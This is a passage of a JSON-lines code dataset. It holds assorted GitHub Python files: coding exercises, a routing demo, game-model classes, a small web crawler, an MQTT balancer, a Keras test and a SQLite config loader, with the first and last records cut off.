open(sys.argv[1], 'r') as f:\n t = int(f.readline().rstrip())\n x = []\n for l in f:\n l = [float(n) for n in re.split(r\"\\s\", l.rstrip())]\n x.append(l)\n ans = magic(t, x)\n with open(\"{}_output\".format(sys.argv[1]), 'w') as o:\n for a in xrange(t):\n o.write(\"Case #{}: {:.7f}\\n\".format(a + 1, ans[a]))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3234.py","file_name":"3234.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27221287187","text":"from AdjacentMatrix import Graph\n\nMAX_Route = 16\n# MAX Routing Number in RIP Protocol\n\ndef DistanceVector(G):\n #initialize 0 (no link edge) as infinite distance\n cost_matrix = G.matrix\n for i in range(len(cost_matrix)):\n for j in range(len(cost_matrix)):\n if cost_matrix[i][j] == 0 and (i != j):\n cost_matrix[i][j] = MAX_Route\n \n print(\"Before Communicating with Adjacent Router\",cost_matrix)\n \n for vertex in range(len(cost_matrix)):\n # vertex x shares its vector\n connect = GetConnectedNode(cost_matrix[vertex])\n for con in connect:\n cost = cost_matrix[vertex,con]\n updated_cost_matrix_con = Relax(cost_matrix[vertex],cost_matrix[con],cost)\n cost_matrix[con] = updated_cost_matrix_con\n print(\"After Communicating with Adjacent Router\\n\",cost_matrix)\n \ndef Relax(cost_vector1, cost_vector2,cost):\n for i in range(len(cost_vector2)):\n if ((cost_vector1[i] + cost) < cost_vector2[i]):\n cost_vector2[i] = cost_vector1[i] + cost\n return cost_vector2\n\ndef GetConnectedNode(cost_matrix):\n return [num for num, s in enumerate(cost_matrix) if s != MAX_Route]\n\nif __name__ == '__main__':\n G = Graph(7)\n G.AddEdge(0,1)\n G.AddEdge(0,2)\n G.AddEdge(0,4)\n G.AddEdge(0,5)\n G.AddEdge(1,2)\n G.AddEdge(2,3)\n G.AddEdge(3,6)\n G.AddEdge(5,6)\n G.PrintMatrix()\n DistanceVector(G)","repo_name":"chinaoel/DataStructure","sub_path":"C_Data_Structure/Graph/DistanceVector.py","file_name":"DistanceVector.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9593542334","text":"import endpoints\nfrom google.appengine.ext import ndb\nimport msgs\nimport datetime\n\n\nclass User(ndb.Model):\n \"\"\"User profile\"\"\"\n name = ndb.StringProperty(required=True)\n email = ndb.StringProperty()\n\n @classmethod\n def create(cls, username, email=None):\n user = User(name=username, email=email)\n user.put()\n\n @classmethod\n def get_by_name(cls, user_name):\n user = User.query(User.name == user_name).get()\n if not user: raise endpoints.NotFoundException(\"No user found with name {}\".format(user_name))\n return user\n\n def getRank(self):\n \"\"\"return the number of matches and winning details\"\"\"\n from . import BattleShip\n # search only the completed games\n q = BattleShip.query(BattleShip.gameOver == True, BattleShip.cancelled == False)\n matches = q.filter(ndb.OR(BattleShip.leftPlayer == self.key, BattleShip.rightPlayer == self.key)).count()\n wins = q.filter(ndb.OR(BattleShip.winner == self.key)).count()\n return msgs.UserRank(name=self.name, matches=matches, wins=wins)\n\n def hasInactiveGames(self):\n \"\"\"\n return inactive games that the user is being part of\n Returns:\n bool: true or false\n \"\"\"\n from . import BattleShip\n q = BattleShip.query(BattleShip.gameOver == False,\n BattleShip.cancelled == False,\n ndb.OR(BattleShip.leftPlayer == self.key, BattleShip.rightPlayer == self.key))\n\n for aGame in q:\n # if any of the user's game is not active for more than 1 hour\n if (datetime.datetime.now() - aGame.time_updated) > datetime.timedelta(hours=1):\n return True\n\n return False\n","repo_name":"jnoortheen/battleship_game_api","sub_path":"battleship/models/_user.py","file_name":"_user.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11435928590","text":"import urllib.request#urllib.request라이브러리 import\r\nfrom bs4 import BeautifulSoup\r\n\r\ntarget_url = 'http://52.68.130.249:8040/textboard/'#목표 url\r\n\r\n# 게시글의 제목과 목록을 가져오는 함수\r\ndef fetch_post_list():\r\n URL = target_url#주소를 URL에 저장\r\n res = urllib.request.urlopen(URL)\r\n html = res.read()\r\n\r\n soup = BeautifulSoup(html, 'html.parser')\r\n table = soup.find('table', class_='kingkongboard-table')\r\n\r\n title_list = table.find_all('td', class_='kingkongboard-list-title')\r\n\r\n links = []#링크를 저장할 리스트 변수 links정의\r\n\r\n links = [td.find('a').get_text() for td in title_list]#title_list를 반복문을 돌려\"a\"를 찾아서 하이퍼링크 씌운다음 링크에 append를 함\r\n #이 코드는\r\n \"\"\"\r\n for td in title_list:\r\n links.append(td.find('a').get_text()['href'])\r\n body_tag.append(bs.find('body'))\r\n\"\"\"\r\n\r\n return links#링크를 반환한다\r\n\r\nresult = fetch_post_list( )#함수 fetch_post_list()호출\r\nprint(result)#결과문 출력\r\n\r\n","repo_name":"PRsH1/C-Python","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37941609683","text":"import json\n\nfrom sqlalchemy.orm import Session\nfrom typing import Dict, List, Tuple, Optional\nimport random\n\nimport game_configs\nimport schemas\nimport utils\nimport utils.utils\nfrom utils import logger, utils\nimport models\nimport crud\n\n\nclass ComputedPlayer:\n def __init__(self, player_id: int, db: Session,\n season: int, date: str,\n player_model: Optional[models.Player] = None):\n self.db = db\n self.player_id = player_id\n self.season = season\n self.date = date\n # 为了减少数据的读操作,可以传入现成的player_model\n self.player_model = player_model \\\n if player_model \\\n else crud.get_player_by_id(db=self.db, player_id=self.player_id)\n self.age = self.player_model.age\n\n # with open(\"./game_configs/data/location_capability.json\", encoding='utf-8') as f_obj:\n # self.location_capability = json.load(f_obj)\n self.location_capability = game_configs.location_capability\n self.capa = dict()\n self.init_capa()\n\n def init_capa(self):\n self.capa['shooting'] = self.player_model.shooting\n self.capa['passing'] = self.player_model.passing\n self.capa['dribbling'] = self.player_model.dribbling\n self.capa['interception'] = self.player_model.interception\n self.capa['pace'] = self.player_model.pace\n self.capa['strength'] = self.player_model.strength\n self.capa['aggression'] = self.player_model.aggression\n self.capa['anticipation'] = self.player_model.anticipation\n self.capa['free_kick'] = self.player_model.free_kick\n self.capa['stamina'] = self.player_model.stamina\n self.capa['goalkeeping'] = self.player_model.goalkeeping\n\n def get_show_data(self) -> schemas.PlayerShow:\n \"\"\"\n 获取返回给前端的球员信息\n :return: schemas.PlayerShow\n \"\"\"\n data = dict()\n data['id'] = self.player_model.id\n data['club_id'] = self.player_model.club_id\n data['club_name'] = self.player_model.club.name\n data['name'] = self.player_model.name\n data['translated_name'] = self.player_model.translated_name\n data['translated_nationality'] = self.player_model.translated_nationality\n data['age'] = self.get_age()\n data['height'] = self.player_model.height\n data['weight'] = self.player_model.weight\n data['birth_date'] = self.player_model.birth_date\n data['wages'] = self.player_model.wages\n data['values'] = self.get_values()\n data['number'] = random.randint(1, 50) # TODO 号码\n data['avatar'] = utils.turn_str2dict(self.player_model.avatar)\n data['real_stamina'] = self.get_real_stamina()\n data['location_num'] = self.get_location_num()\n data['capa'] = self.get_all_capa(is_retain_decimal=True)\n data['top_location'] = self.get_top_lo_n_capa()[0]\n data['superior_location'] = self.get_superior_location()\n data['top_capa'] = self.get_top_lo_n_capa()[1]\n data['location_capa'] = {a[0]: a[1] for a in self.get_sorted_location_capa(True)}\n data['style_tag'] = self.get_style_tag()\n data['talent_tag'] = self.get_talent_tag()\n data['recent_ratings'] = self.get_ratings_in_recent_games()\n data['on_sale'] = self.player_model.on_sale\n return schemas.PlayerShow(**data)\n\n def get_talent_tag(self) -> List[str]:\n \"\"\"\n 根据球员能力值上线计算天赋\n \"\"\"\n talent_tag = []\n if self.player_model.goalkeeping_limit > 85:\n talent_tag.append(\"壁垒\")\n if self.player_model.height > 185:\n talent_tag.append(\"高塔\")\n if self.player_model.strength_limit > 85 and self.player_model.aggression_limit > 85:\n talent_tag.append(\"推土机\")\n if self.player_model.pace_limit > 85:\n talent_tag.append(\"猎豹\")\n if self.player_model.dribbling_limit > 85:\n talent_tag.append(\"魔术师\")\n if self.player_model.passing_limit > 85:\n talent_tag.append(\"发动机\")\n if self.player_model.shooting_limit > 85:\n talent_tag.append(\"重炮手\")\n if self.player_model.shooting_limit > 83 and self.player_model.aggression_limit > 83:\n talent_tag.append(\"偷猎者\")\n if self.player_model.stamina_limit > 85:\n talent_tag.append(\"大心脏\")\n if self.player_model.free_kick_limit > 85:\n talent_tag.append(\"任意球大师\")\n if self.player_model.interception_limit > 87:\n talent_tag.append(\"扫荡者\")\n if len(talent_tag) == 0:\n talent_tag.append(\"普通一员\")\n return talent_tag\n\n def get_style_tag(self) -> List[str]:\n \"\"\"\n 根据球员当前能力值计算偏好\n \"\"\"\n style_tag = []\n if self.player_model.passing > 50 and self.player_model.interception > 50:\n style_tag.append(\"就地反抢\")\n if self.player_model.pace > 50 and self.player_model.shooting > 50:\n style_tag.append(\"前插攻击\")\n if self.player_model.aggression < 50 and self.player_model.interception > 50:\n style_tag.append(\"防守内收\")\n if self.player_model.aggression > 50:\n style_tag.append(\"高位压迫\")\n if self.player_model.pace > 50 and self.player_model.passing > 50:\n style_tag.append(\"套边传中\")\n if self.player_model.strength > 50 and self.player_model.pace < 40:\n style_tag.append(\"站桩护球\")\n if self.player_model.passing > 60 and self.player_model.anticipation > 60:\n style_tag.append(\"传球组织\")\n if self.player_model.aggression > 50 and self.player_model.anticipation < 50:\n style_tag.append(\"利用身体\")\n if self.player_model.dribbling > 60:\n style_tag.append(\"盘带过人\")\n if self.player_model.shooting > 60:\n style_tag.append(\"远射得分\")\n if len(style_tag) == 0:\n style_tag.append(\"听从指挥\")\n return style_tag\n\n def get_location_num(self) -> Dict[str, int]:\n \"\"\"\n 获取球员各个位置的比赛次数\n \"\"\"\n data = dict()\n data['ST_num'] = self.player_model.ST_num\n data['CM_num'] = self.player_model.CM_num\n data['LW_num'] = self.player_model.LW_num\n data['RW_num'] = self.player_model.RW_num\n data['CB_num'] = self.player_model.CB_num\n data['LB_num'] = self.player_model.LB_num\n data['RB_num'] = self.player_model.RB_num\n data['GK_num'] = self.player_model.GK_num\n data['CAM_num'] = self.player_model.CAM_num\n data['LM_num'] = self.player_model.LM_num\n data['RM_num'] = self.player_model.RM_num\n data['CDM_num'] = self.player_model.CDM_num\n return data\n\n def get_all_capa(self, is_retain_decimal: bool = False) -> dict:\n \"\"\"\n 获取所有能力值\n :return: 能力值字典\n :param is_retain_decimal: 是否保留小数\n \"\"\"\n data = dict()\n data['shooting'] = self.get_capa('shooting')\n data['passing'] = self.get_capa('passing')\n data['dribbling'] = self.get_capa('dribbling')\n data['interception'] = self.get_capa('interception')\n data['pace'] = self.get_capa('pace')\n data['strength'] = self.get_capa('strength')\n data['aggression'] = self.get_capa('aggression')\n data['anticipation'] = self.get_capa('anticipation')\n data['free_kick'] = self.get_capa('free_kick')\n data['stamina'] = self.get_capa('stamina') # 注意,这个是体力“能力”,不是真正的体力!\n data['goalkeeping'] = self.get_capa('goalkeeping')\n if is_retain_decimal:\n return {k: float(utils.retain_decimal(v)) for k, v in data.items()}\n return data\n\n def get_capa(self, capa_name: str, is_retain_decimal: bool = False,\n is_filtered_by_stamina: bool = False) -> float:\n \"\"\"\n 获取年龄滤镜过的能力值\n :param capa_name: 能力名\n :param is_retain_decimal: 是否保留小数\n :param is_filtered_by_stamina: 是否考虑体力因素,专门用于ai选人策略中\n :return: 能力值\n \"\"\"\n ori_capa = self.capa[capa_name]\n age = self.get_age()\n start_age = 30\n if age >= start_age:\n weight = 1 - (age - 30 + 1) * 0.05\n if weight <= 0:\n weight = 0.05\n else:\n weight = 1\n if is_retain_decimal:\n return float(utils.retain_decimal(ori_capa * weight))\n return ori_capa * weight\n\n def get_location_capa(self, lo_name: str, is_retain_decimal: bool = False) -> float:\n \"\"\"\n 获取球员指定位置的综合能力\n :param lo_name: 位置名\n :return: 位置能力值\n :param is_retain_decimal: 是否保留小数\n \"\"\"\n weight_dict = dict()\n for lo in self.location_capability:\n # 拿到指定位置的能力比重\n if lo['name'] == lo_name:\n weight_dict = lo['weight']\n break\n location_capa = 0\n if not weight_dict:\n logger.error('没有找到对应位置!')\n for capa_name, weight in weight_dict.items():\n location_capa += self.get_capa(capa_name) * weight\n if is_retain_decimal:\n return float(utils.retain_decimal(location_capa))\n return location_capa\n\n def get_sorted_location_capa(self, is_retain_decimal: bool = False) -> List[List]:\n \"\"\"\n 获取各个位置能力的降序列表\n :return: List[List[lo_name, lo_capa]]\n :param is_retain_decimal: 是否保留小数\n \"\"\"\n location_capa = []\n if is_retain_decimal:\n for location in self.location_capability:\n location_capa.append(\n [location['name'], self.get_location_capa(location['name'], True)]\n )\n else:\n for location in self.location_capability:\n location_capa.append(\n [location['name'], self.get_location_capa(location['name'])]\n )\n location_capa = sorted(location_capa, key=lambda x: -x[1])\n return location_capa\n\n def get_top_lo_n_capa(self, is_retain_decimal: bool = False) -> Tuple[str, float]:\n \"\"\"\n 获取最佳位置以及该位置的综合能力\n :return: (位置名, 能力值)\n :param is_retain_decimal: 是否保留小数\n \"\"\"\n lo_name, top_capa = self.get_sorted_location_capa()[0]\n if is_retain_decimal:\n top_capa = float(utils.retain_decimal(top_capa))\n return lo_name, top_capa\n\n def get_ratings_in_recent_games(self, game_num: int = 5) -> List[float]:\n \"\"\"\n 获取近n场比赛的评分列表 排序由远到近\n :param game_num: 欲获取的比赛次数\n \"\"\"\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=self.season, end_season=self.season)\n if not game_player_data:\n return []\n game_player_data_sorted = sorted(game_player_data, key=lambda x: x.id, reverse=True)\n ratings = [x.final_rating for x in game_player_data_sorted]\n return ratings[:game_num][::-1] if len(ratings) >= game_num else ratings[::-1]\n\n def get_avg_rating_in_recent_year(self) -> float:\n \"\"\"\n 获取近一年比赛的评分数据\n \"\"\"\n start_season = self.season - 1 if self.season - 1 != 0 else self.season\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=start_season, end_season=self.season)\n if not game_player_data:\n return 6.0\n rating = float(\n utils.retain_decimal(sum([p.real_rating for p in game_player_data]) / len(game_player_data)))\n rating = rating if rating <= 10 else 10\n return rating\n\n def get_real_stamina(self) -> int:\n \"\"\"\n 获取真实体力值\n \"\"\"\n if not self.player_model.last_game_date:\n return 100\n last_stamina = self.player_model.real_stamina\n days: int = (utils.Date(self.date).date - utils.Date(\n self.player_model.last_game_date).date).days\n re = int(days * 3 + last_stamina) if int(days * 3 + last_stamina) <= 100 else 100\n return re\n\n def get_age(self) -> int:\n \"\"\"\n 获取年龄\n :return: 年龄\n \"\"\"\n if self.season:\n return self.age + self.season - 1\n else:\n return self.age + self.player_model.club.league.save.season - 1\n\n def get_game_player_data(self, start_season: int = None, end_season: int = None) \\\n -> List[models.GamePlayerData]:\n \"\"\"\n 获取指定球员某赛季的比赛信息\n :param start_season: 开始赛季,若为空,默认1开始\n :param end_season: 结束赛季,若为空,默认当前赛季\n \"\"\"\n s_season = start_season if start_season else 1\n e_season = end_season if end_season else self.season\n game_player_data: List[models.GamePlayerData] = [\n game_data for game_data in self.player_model.game_data if \\\n s_season <= int(game_data.season) <= e_season]\n\n return game_player_data\n\n def get_total_game_player_data(self, start_season: int = None,\n end_season: int = None) -> schemas.TotalGamePlayerDataShow:\n \"\"\"\n 获取指定球员某赛季的统计比赛信息\n :param start_season: 开始赛季,若为空,默认1开始\n :param end_season: 结束赛季,若为空,默认当前赛季\n \"\"\"\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=start_season, end_season=end_season)\n if not game_player_data:\n return schemas.TotalGamePlayerDataShow()\n result = dict()\n result['id'] = self.player_id\n result['appearance'] = len(game_player_data)\n result[\"final_rating\"] = float(\n utils.retain_decimal(sum([p.final_rating for p in game_player_data]) / len(game_player_data)))\n result['actions'] = sum([p.actions for p in game_player_data])\n result['shots'] = sum([p.shots for p in game_player_data])\n result['goals'] = sum([p.goals for p in game_player_data])\n result['assists'] = sum([p.assists for p in game_player_data])\n result['passes'] = sum([p.passes for p in game_player_data])\n result['pass_success'] = sum([p.pass_success for p in game_player_data])\n result['dribbles'] = sum([p.dribbles for p in game_player_data])\n result['dribble_success'] = sum([p.dribble_success for p in game_player_data])\n result['tackles'] = sum([p.tackles for p in game_player_data])\n result['tackle_success'] = sum([p.tackle_success for p in game_player_data])\n result['aerials'] = sum([p.aerials for p in game_player_data])\n result['aerial_success'] = sum([p.aerial_success for p in game_player_data])\n result['saves'] = sum([p.saves for p in game_player_data])\n result['save_success'] = sum([p.save_success for p in game_player_data])\n return schemas.TotalGamePlayerDataShow(**result)\n\n def get_values(self) -> int:\n \"\"\"\n 获取身价\n \"\"\"\n top_capa = self.get_top_lo_n_capa()[1]\n basic_values = top_capa ** 3 / 70.0\n avg_rating = self.get_avg_rating_in_recent_year()\n extra_values = avg_rating * 2000 - 12000\n real_values = int(basic_values + extra_values)\n if real_values < 10:\n real_values = 10\n return real_values\n\n def get_superior_location(self) -> List[str]:\n \"\"\"\n 获取优势位置\n 暂时的策略是返回能力前三的位置\n TODO 优化算法\n \"\"\"\n return [x[0] for x in self.get_sorted_location_capa()[:3]]\n","repo_name":"Owivi-Breaker/backend","sub_path":"modules/computed_data_app/computed_player.py","file_name":"computed_player.py","file_ext":"py","file_size_in_byte":16187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"41558258064","text":"import asyncio\nimport time\nimport json\nimport gmqtt\n\nfrom utils.utils import run_event_loop, STOP, init_client\nfrom utils.consts import BALANCER_TOPIC, WORKER_REGISTRATION_TOPIC, WORKER_REGISTRED_TOPIC, \\\n WORKER_UNREGISTER_TOPIC, BALANCER_WORKER_TOPIC\nfrom utils.worker import WorkersStorageItem, WorkersStorage\n\n\nmessages_queue = asyncio.Queue()\nworkers_storage = WorkersStorage()\n\n\nasync def on_message(client, topic, payload, qos, properties):\n if topic == BALANCER_TOPIC:\n messages_queue.put_nowait(payload)\n return 0\n\n print('Balancer. Message.', f\"Topic: '{topic}'.\", 'Payload:', payload)\n worker_hex = payload.decode('utf-8')\n if topic == WORKER_REGISTRATION_TOPIC: \n worker = workers_storage.add(worker_hex)\n data = {\"worker_num\": worker.number, \"worker_hex\": worker.worker_hex}\n client.publish(WORKER_REGISTRED_TOPIC, json.dumps(data))\n elif topic == WORKER_UNREGISTER_TOPIC:\n workers_storage.delete(worker_hex)\n return 0\n\n\nasync def send_messages(client):\n \"\"\"\n Balance messages between workers\n \"\"\"\n while True:\n if STOP.is_set():\n break\n\n payload = await messages_queue.get()\n worker = await workers_storage.next_worker()\n client.publish(worker.balancer_topic, payload, qos=1)\n print('Balancer. Publish.', f\"Topic: '{worker.balancer_topic}'.\", 'Payload', payload)\n messages_queue.task_done()\n\n\nasync def main(broker_host, token):\n client = gmqtt.Client(\"balancer\")\n client = await init_client(client, broker_host, token, on_message=on_message)\n client.subscribe(BALANCER_TOPIC, qos=1)\n client.subscribe(WORKER_REGISTRATION_TOPIC, qos=1)\n client.subscribe(WORKER_UNREGISTER_TOPIC, qos=1)\n asyncio.ensure_future(send_messages(client))\n \n await STOP.wait()\n await client.disconnect()\n\n\nif __name__ == '__main__':\n run_event_loop(main)\n","repo_name":"bondardima42/balancer","sub_path":"balancer.py","file_name":"balancer.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13395655456","text":"import collections\nd={}\nnum=1\nwhile True:\n try:\n item=input(\"\").upper()\n if item in d:\n d[item]=num+1\n continue\n else:\n d[item]=num\n continue\n\n except EOFError:\n od = collections.OrderedDict(sorted(d.items()))\n for a,b in od.items() :\n print(b,a)\n break\n except KeyError:\n continue","repo_name":"AhmedAbdElFatahMohamed/CS50P","sub_path":"CS50P/problem set3 (exceptions)/grocery/grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9571782925","text":"p1=input()\n#p1 = P.rstrip('\\r\\n')\np2=p1.split(\". \")\np3=\"\"\nn=0\nfor val in p2:\n f=val[:1].upper()\n f=f+ val[1:]\n \n if (n==0):\n p3=f\n else:\n p3=p3 + \". \" + f\n \n n=n+1\nprint(p3)\n","repo_name":"shilpasayura/algohack","sub_path":"code-basic/7_strings.py","file_name":"7_strings.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"33759969588","text":"import turtle#海龟绘图,快捷使用代换 as t\r\nimport random\r\nimport time\r\ndef drawpicture():\r\n turtle.colormode(255)\r\n turtle.screensize(600,600,\"gray\")#宽高,背���色\r\n turtle.pensize(10)\r\n turtle.pencolor(random_color())\r\n turtle.fillcolor(random_color())\r\n turtle.speed(3)\r\n turtle.begin_fill()\r\n for _ in range(5):\r\n turtle.forward(200)\r\n turtle.right(144)\r\n turtle.end_fill()\r\n time.sleep(2)\r\n \r\n turtle.penup()\r\n turtle.goto(-150,-120)\r\n turtle.color(\"violet\")\r\n turtle.write(\"Done\", font=('Arial', 40, 'normal'))\r\n \r\n turtle.mainloop()\r\n \r\n \r\n \r\n# 获取随机颜色\r\ndef random_color():\r\n R = random.randrange(255)\r\n G = random.randrange(255)\r\n B = random.randrange(255)\r\n return (R, G, B)","repo_name":"code-killerr/python_practise","sub_path":"Django/HelloWorld/HelloWorld/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33878431869","text":"import numpy as np\nimport pytest\n\nfrom keras.models import Sequential\nfrom keras.engine.training import weighted_objective\nfrom keras.layers.core import TimeDistributedDense, Masking\nfrom keras import objectives\nfrom keras import backend as K\n\n\ndef test_masking():\n np.random.seed(1337)\n X = np.array([[[1], [1]],\n [[0], [0]]])\n model = Sequential()\n model.add(Masking(mask_value=0, input_shape=(2, 1)))\n model.add(TimeDistributedDense(1, init='one'))\n model.compile(loss='mse', optimizer='sgd')\n y = np.array([[[1], [1]],\n [[1], [1]]])\n loss = model.train_on_batch(X, y)\n assert loss == 0\n\n\ndef test_loss_masking():\n weighted_loss = weighted_objective(objectives.get('mae'))\n shape = (3, 4, 2)\n X = np.arange(24).reshape(shape)\n Y = 2 * X\n\n # Normally the trailing 1 is added by standardize_weights\n weights = np.ones((3,))\n mask = np.ones((3, 4))\n mask[1, 0] = 0\n\n out = K.eval(weighted_loss(K.variable(X),\n K.variable(Y),\n K.variable(weights),\n K.variable(mask)))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"tykimos/tykimos.github.io","sub_path":"tests/test_loss_masking.py","file_name":"test_loss_masking.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"9365201559","text":"#\n# @lc app=leetcode.cn id=766 lang=python3\n#\n# [766] 托普利茨矩阵\n#\n\n# @lc code=start\nfrom collections import deque\nclass Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n queue = deque(matrix[0])\n for r in range(1, len(matrix)):\n queue.pop()\n queue.append(matrix[r][0])\n for c in range(1,len(matrix[r])):\n if queue.popleft() != matrix[r][c]:\n return False\n queue.append(matrix[r][c])\n \n return True\n\n# @lc code=end\n\n","repo_name":"mqinbin/python_leetcode","sub_path":"766.托普利茨矩阵.py","file_name":"766.托普利茨矩阵.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11418064423","text":"# python3 -m annotator.annotator\n\nimport cv2\nfrom annotator.panoptic_segmenter import PanopticSegmenter\nfrom annotator.exif import MetaDataManager\nfrom PIL import Image\nimport torch\nimport cv2\nimport sys\n\n\nclass Annotator(object):\n\n def __init__(self, *args):\n super(Annotator, self).__init__(*args)\n self.panopticSegmenter = PanopticSegmenter()\n\n def getAnnotationData(self, imgPath):\n return self._makeAnnotation(imgPath)\n\n def annotate(self, imgPath):\n referenceImage = MetaDataManager.read(imgPath)\n isImageAnnotated = referenceImage.doesKeyExist(\n 'segmentData') and referenceImage.doesKeyExist('labelData')\n if not isImageAnnotated:\n annotation = self._makeAnnotation(imgPath)\n referenceImage.put(annotation)\n return True\n return False\n\n def _makeAnnotation(self, imgPath):\n targetImage = cv2.imread(imgPath)\n targetImage = cv2.cvtColor(targetImage, cv2.COLOR_BGR2RGB)\n segments = self.panopticSegmenter.predict_segments(targetImage)\n segmentMatrix = segments[0]\n segmentLabels = segments[1]\n self.segmentMetaData = self.panopticSegmenter.meta_data\n self.labelData = self.getCategoryLabelNames(segmentLabels)\n self.segmentData = self.exportToCSV(segmentMatrix)\n return {\n 'segmentData': self.segmentData,\n 'labelData': self.labelData,\n 'dimensions': {\n 'height': segmentMatrix.size()[0],\n 'width': segmentMatrix.size()[1],\n }\n }\n\n def getCategoryLabelNames(self, segmentLabels):\n res = []\n for rawSegmentLabel in segmentLabels:\n segmentId = rawSegmentLabel['category_id']\n if rawSegmentLabel['isthing']:\n label = self.segmentMetaData.thing_classes[segmentId]\n else:\n label = self.segmentMetaData.stuff_classes[segmentId]\n res.append({'category_id': segmentId,\n 'category_label': label})\n return res\n\n def exportToCSV(self, mat: torch.tensor):\n return ','.join(','.join('%d' % x for x in y) for y in mat)\n\n def isAnnotated(self):\n raise NotImplementedError()\n","repo_name":"parthraghav/Touch-View","sub_path":"annotator/annotator.py","file_name":"annotator.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"33627764153","text":"from config import *\nimport sqlite3\nfrom flask import g\n\nDATABASE = './static/sp_config.db'\n\ndef connect_db():\n return sqlite3.connect('static/sp_config.db')\n\ndef delete_db(app):\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"DELETE FROM sp_config\")\n conn.commit()\n conn.close()\n\ndef load_db(app):\n \n spectro_pointer_config = {}\n # Create empty list for appending every value\n config_data = list()\n\n spectro_pointer_config['use_raspberry'] = int(USE_RASPBERRY)\n config_data.append(spectro_pointer_config['use_raspberry'])\n\n spectro_pointer_config['correct_vertical_camera'] = int(CORRECT_VERTICAL_CAMERA)\n config_data.append(spectro_pointer_config['correct_vertical_camera'])\n\n spectro_pointer_config['correct_horizontal_camera'] = int(CORRECT_HORIZONTAL_CAMERA)\n config_data.append(spectro_pointer_config['correct_horizontal_camera'])\n\n spectro_pointer_config['center_radius'] = int(CENTER_RADIUS)\n config_data.append(spectro_pointer_config['center_radius'])\n\n spectro_pointer_config['show_center_circle'] = int(SHOW_CENTER_CIRCLE)\n config_data.append(spectro_pointer_config['show_center_circle'])\n\n spectro_pointer_config['enable_photo'] = int(ENABLE_PHOTO)\n config_data.append(spectro_pointer_config['enable_photo'])\n\n spectro_pointer_config['enable_video'] = int(ENABLE_VIDEO)\n config_data.append(spectro_pointer_config['enable_video'])\n\n spectro_pointer_config['record_seconds'] = int(RECORD_SECONDS)\n config_data.append(spectro_pointer_config['record_seconds'])\n\n spectro_pointer_config['threshold'] = int(THRESHOLD)\n config_data.append(spectro_pointer_config['threshold'])\n\n spectro_pointer_config['resolution'] = str(RESOLUTION)\n config_data.append(spectro_pointer_config['resolution'])\n\n spectro_pointer_config['framerate'] = int(FRAMERATE)\n config_data.append(spectro_pointer_config['framerate'])\n\n spectro_pointer_config['sensor_mode'] = int(SENSOR_MODE)\n config_data.append(spectro_pointer_config['sensor_mode'])\n\n spectro_pointer_config['shutter_speed'] = int(SHUTTER_SPEED)\n config_data.append(spectro_pointer_config['shutter_speed'])\n\n spectro_pointer_config['iso'] = int(ISO)\n config_data.append(spectro_pointer_config['iso'])\n\n # Transform config_data list into a tuple\n config_data = tuple(config_data)\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"INSERT INTO sp_config VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?)\", config_data)\n conn.commit()\n conn.close()\n\ndef init_db(app):\n conn = connect_db()\n c = conn.cursor()\n try:\n c.execute('''create table sp_config (USE_RASPBERRY int, CORRECT_VERTICAL_CAMERA int,\n CORRECT_HORIZONTAL_CAMERA int, CENTER_RADIUS int,\n SHOW_CENTER_CIRCLE int, ENABLE_PHOTO int,\n ENABLE_VIDEO int,RECORD_SECONDS int, THRESHOLD int,\n RESOLUTION text, FRAMERATE int, SENSOR_MODE int,\n SHUTTER_SPEED int, ISO int)''') \n load_db(app)\n\n except sqlite3.OperationalError as e:\n print('table sp_config already exists' in str(e))\n conn.commit()\n conn.close()\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\n# Function for sql UPDATE statement string building\ndef sql_stat_build(str1,str2,cont,listM,valueSP): \n # If value is resolution do not convert to int\n if str2 == \"RESOLUTION=?\":\n listM.append(valueSP)\n else: \n listM.append(int(valueSP))\n\n if cont == 0:\n str1 += str2\n else:\n str1 += \",\" + str2\n\n return str1\n\ndef set_sp_config(app,**spectro_pointer_config):\n with app.app_context():\n conn = connect_db()\n # Aux variable for value control\n value_control = 0\n # Create string were SQL statements will be added\n string_sql = \"UPDATE sp_config SET \"\n # Create empty list were values to update 